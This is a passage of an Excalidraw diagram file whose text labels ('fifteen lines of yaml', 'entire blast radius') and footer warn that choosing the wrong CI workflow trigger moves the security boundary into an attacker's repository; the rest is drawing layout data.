      "verticalAlign": "top",
      "strokeColor": "#64748b",
      "backgroundColor": "transparent",
      "fillStyle": "solid",
      "strokeWidth": 1,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 500026,
      "version": 1,
      "versionNonce": 500027,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": null,
      "link": null,
      "locked": false,
      "containerId": null,
      "lineHeight": 1.25
    },

    {
      "type": "ellipse",
      "id": "sum_dot_3",
      "x": 900,
      "y": 706,
      "width": 14,
      "height": 14,
      "strokeColor": "#1f2937",
      "backgroundColor": "#1f2937",
      "fillStyle": "solid",
      "strokeWidth": 1,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 500030,
      "version": 1,
      "versionNonce": 500031,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": null,
      "link": null,
      "locked": false
    },
    {
      "type": "text",
      "id": "sum_text_3",
      "x": 820,
      "y": 728,
      "width": 200,
      "height": 22,
      "text": "fifteen lines of yaml",
      "originalText": "fifteen lines of yaml",
      "fontSize": 15,
      "fontFamily": 3,
      "textAlign": "center",
      "verticalAlign": "top",
      "strokeColor": "#1f2937",
      "backgroundColor": "transparent",
      "fillStyle": "solid",
      "strokeWidth": 1,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 500032,
      "version": 1,
      "versionNonce": 500033,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": null,
      "link": null,
      "locked": false,
      "containerId": null,
      "lineHeight": 1.25
    },
    {
      "type": "line",
      "id": "sum_line_34",
      "x": 920,
      "y": 713,
      "width": 360,
      "height": 0,
      "strokeColor": "#64748b",
      "backgroundColor": "transparent",
      "fillStyle": "solid",
      "strokeWidth": 1,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 500034,
      "version": 1,
      "versionNonce": 500035,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": null,
      "link": null,
      "locked": false,
      "points": [[0, 0], [360, 0]]
    },
    {
      "type": "text",
      "id": "sum_arrow_3",
      "x": 1080,
      "y": 700,
      "width": 40,
      "height": 22,
      "text": "→",
      "originalText": "→",
      "fontSize": 22,
      "fontFamily": 3,
      "textAlign": "center",
      "verticalAlign": "top",
      "strokeColor": "#64748b",
      "backgroundColor": "transparent",
      "fillStyle": "solid",
      "strokeWidth": 1,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 500036,
      "version": 1,
      "versionNonce": 500037,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": null,
      "link": null,
      "locked": false,
      "containerId": null,
      "lineHeight": 1.25
    },

    {
      "type": "ellipse",
      "id": "sum_dot_4",
      "x": 1280,
      "y": 706,
      "width": 14,
      "height": 14,
      "strokeColor": "#b91c1c",
      "backgroundColor": "#b91c1c",
      "fillStyle": "solid",
      "strokeWidth": 1,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 500040,
      "version": 1,
      "versionNonce": 500041,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": null,
      "link": null,
      "locked": false
    },
    {
      "type": "text",
      "id": "sum_text_4",
      "x": 1180,
      "y": 728,
      "width": 220,
      "height": 22,
      "text": "entire blast radius",
      "originalText": "entire blast radius",
      "fontSize": 15,
      "fontFamily": 3,
      "textAlign": "center",
      "verticalAlign": "top",
      "strokeColor": "#7f1d1d",
      "backgroundColor": "transparent",
      "fillStyle": "solid",
      "strokeWidth": 1,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 500042,
      "version": 1,
      "versionNonce": 500043,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": null,
      "link": null,
      "locked": false,
      "containerId": null,
      "lineHeight": 1.25
    },

    {
      "type": "text",
      "id": "footer",
      "x": 380,
      "y": 790,
      "width": 1080,
      "height": 22,
      "text": "the trigger is the security boundary. pick wrong, and the boundary moves into the attacker's repo.",
      "originalText": "the trigger is the security boundary. pick wrong, and the boundary moves into the attacker's repo.",
      "fontSize": 16,
      "fontFamily": 3,
      "textAlign": "center",
      "verticalAlign": "top",
      "strokeColor": "#1f2937",
      "backgroundColor": "transparent",
      "fillStyle": "solid",
      "strokeWidth": 1,
      "strokeStyle": "solid",
      "roughness": 1,
      "opacity": 100,
      "angle": 0,
      "seed": 600001,
      "version": 1,
      "versionNonce": 600002,
      "isDeleted": false,
      "groupIds": [],
      "boundElements": null,
      "link": null,
      "locked": false,
      "containerId": null,
      "lineHeight": 1.25
    }
  ],
  "appState": {
    "viewBackgroundColor": "#ffffff",
    "gridSize": null
  },
  "files": {}
}
